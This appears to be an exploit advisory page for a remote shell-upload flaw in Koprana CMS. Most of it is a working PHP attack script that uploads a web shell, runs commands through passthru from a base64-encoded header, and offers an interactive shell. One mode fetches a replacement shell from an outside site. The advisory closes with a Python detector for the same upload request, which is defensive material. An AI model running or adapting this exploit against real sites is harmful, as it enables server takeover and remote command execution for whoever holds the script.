Koprana CMS Shell Upload

2012.04.12
Credit: The UnKn0wN
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: N/A

<?php //NOTE : - If you are using BHR put this file in \exploits\webapp folder // - BHR Download link => http://www.mediafire.com/?ij9rfpfw6s7uzxf (for windows only) /* load exploits/webapp/koprana_upload.php set HOST target set PORT Taget_PORT (default : 80) set MODE (1 for backdoor upload/2 for shell upload) set FILE (save format TXT/SQL) exploit !koprana_upload @ HOST = localhost = Target URL @ PORT = 80 = Target Port @ PATH = / = Web site path @ MODE = 1 = Exploit Mode */ error_reporting(0); set_time_limit(0); ini_set("default_socket_timeout", 5); function http_send($host, $port,$packet) { if (!($sock = fsockopen($host, $port))) die("\n[-] No response from {$host}:{$port}\n"); fputs($sock, $packet); return stream_get_contents($sock); } print "\n+-----------------------[ The Crazy3D Team ]--------------------------+"; print "\n| Koprana CMS Remote Upload Exploit |"; print "\n| by The UnKn0wN |"; print "\n| Greets to : The Crazy3D members and all Algerian h4x0rs |"; print "\n+---------------------------------------------------------------------+"; print "\n| www.Dofus-Exploit.com | WwW.IzzI-Hack.com |"; print "\n+---------------------------------------------------------------------+\n"; if ($argc < 3) { print "\nUsage......: php $argv[0] <host> <path> <mode>\n"; print "\nExample....: php $argv[0] localhost / 1"; print "\nExample....: php $argv[0] localhost /site/ 2\n"; die(); } $host = $argv[1]; $port = $argv[2]; $path = $argv[3]; $mode = $argv[4]; $shell = "<?php error_reporting(0);print(_code_);passthru(base64_decode(\$_SERVER[HTTP_CMD]));die; ?>"; $shell2 = file_get_contents("http://dofus-exploit.com/exploit/ibiza.txt"); //username : UnKnOwN password : lolilol (You can modify this by your own shell) if($mode == "2") $shell = $shell2; $boundary = "---------".str_replace(".", "", microtime()); $payload = "--{$boundary}\r\n"; $payload .= "Content-Disposition: form-data; name=\"fichier\"; filename=\"sh.php\"\r\n"; $payload .= "Content-Type: 
application/x-php\r\n\r\n"; $payload .= "".$shell."\n\r\n"; $payload .= "--{$boundary}\r\n"; $payload .= "Content-Disposition: form-data; name=\"execute\"\r\n\r\nexecute\r\n"; $payload .= "--{$boundary}\r\n"; $payload .= "Content-Disposition: form-data; name=\"dossier\"\r\n\r\n./\r\n"; $payload .= "--{$boundary}--\r\n"; $packet = "POST {$path}index.php?pages=buy1_ontrue HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Content-Type: multipart/form-data; boundary={$boundary}\r\n"; $packet .= "Content-Length: ".strlen($payload)."\r\n"; $packet .= "Connection: keep-alive\r\n\r\n{$payload}"; http_send($host,$port, $packet); if($mode == "1") { $packet = "GET {$path}sh.php HTTP/1.0\r\n"; $packet .= "Host: {$host}\r\n"; $packet .= "Cmd: %s\r\n"; $packet .= "Connection: close\r\n\r\n"; if (!($sock = http_send($host,$port, $packet))) die("\n[-] Upload failed!\n"); print "[+]Backdoor was upload!\n[+]Getting the shell...\n"; while(1) { print "\nBHR@{$host}# "; if (($cmd = trim(fgets(STDIN))) == "exit") break; preg_match("/_code_(.*)/s", http_send($host,$port, sprintf($packet, base64_encode($cmd))), $m) ? print $m[1] : die("\n[-] Exploit failed!\n"); } }else print "Go to {$host}{$path}sh.php to check.\n"; ?>
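A defender-side check for the request shape this PoC sends (a multipart POST to `index.php?pages=buy1_ontrue` carrying a `fichier` file part and a `dossier` destination field), as an added example that is not part of the original advisory. The names `inspect_upload` and `sample_body` and the extension list are hypothetical, and the sample request bodies are constructed with placeholder content.

```python
import email

# Extensions a PHP-enabled server may execute (illustrative, not exhaustive).
SCRIPT_EXTS = {".php", ".php3", ".php4", ".php5", ".phtml", ".phar"}
UPLOAD_MARKER = "pages=buy1_ontrue"  # upload endpoint named in the PoC

def inspect_upload(target, content_type, body):
    """Return findings for one captured multipart POST (hypothetical helper)."""
    if UPLOAD_MARKER not in target:
        return []
    raw = b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body
    msg = email.message_from_bytes(raw)
    if not msg.is_multipart():
        return []
    findings = []
    for part in msg.get_payload():
        name = part.get_param("name", header="content-disposition")
        filename = part.get_filename()
        if name == "fichier" and filename:
            # Check every dot-separated suffix so "x.php.jpg" is caught too.
            suffixes = {"." + s.lower() for s in filename.split(".")[1:]}
            if suffixes & SCRIPT_EXTS:
                findings.append("script upload: " + filename)
        elif name == "dossier":
            dest = part.get_payload(decode=True).decode(errors="replace").strip()
            # A destination starting with "." or "/", or containing "..",
            # means the client is steering where the file is written.
            if dest.startswith((".", "/")) or ".." in dest:
                findings.append("client-chosen destination: " + dest)
    return findings

def sample_body(filename, dest, boundary="constructedboundary123"):
    """Build a constructed request body with harmless placeholder content."""
    return (
        f"--{boundary}\r\n"
        f'Content-Disposition: form-data; name="fichier"; filename="{filename}"\r\n'
        "Content-Type: application/octet-stream\r\n\r\n"
        "PLACEHOLDER\r\n"
        f"--{boundary}\r\n"
        'Content-Disposition: form-data; name="dossier"\r\n\r\n'
        f"{dest}\r\n"
        f"--{boundary}--\r\n"
    ).encode()

CT = "multipart/form-data; boundary=constructedboundary123"

if __name__ == "__main__":
    print(inspect_upload("/index.php?pages=buy1_ontrue", CT, sample_body("sh.php", "./")))
    print(inspect_upload("/index.php?pages=buy1_ontrue", CT, sample_body("photo.jpg", "uploads")))
```

The same check belongs server-side in the upload handler itself: reject script extensions and ignore any client-supplied destination directory.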

References:

http://www.mediafire.com/?ij9rfpfw6s7uzxf



Copyright 2024, cxsecurity.com

 
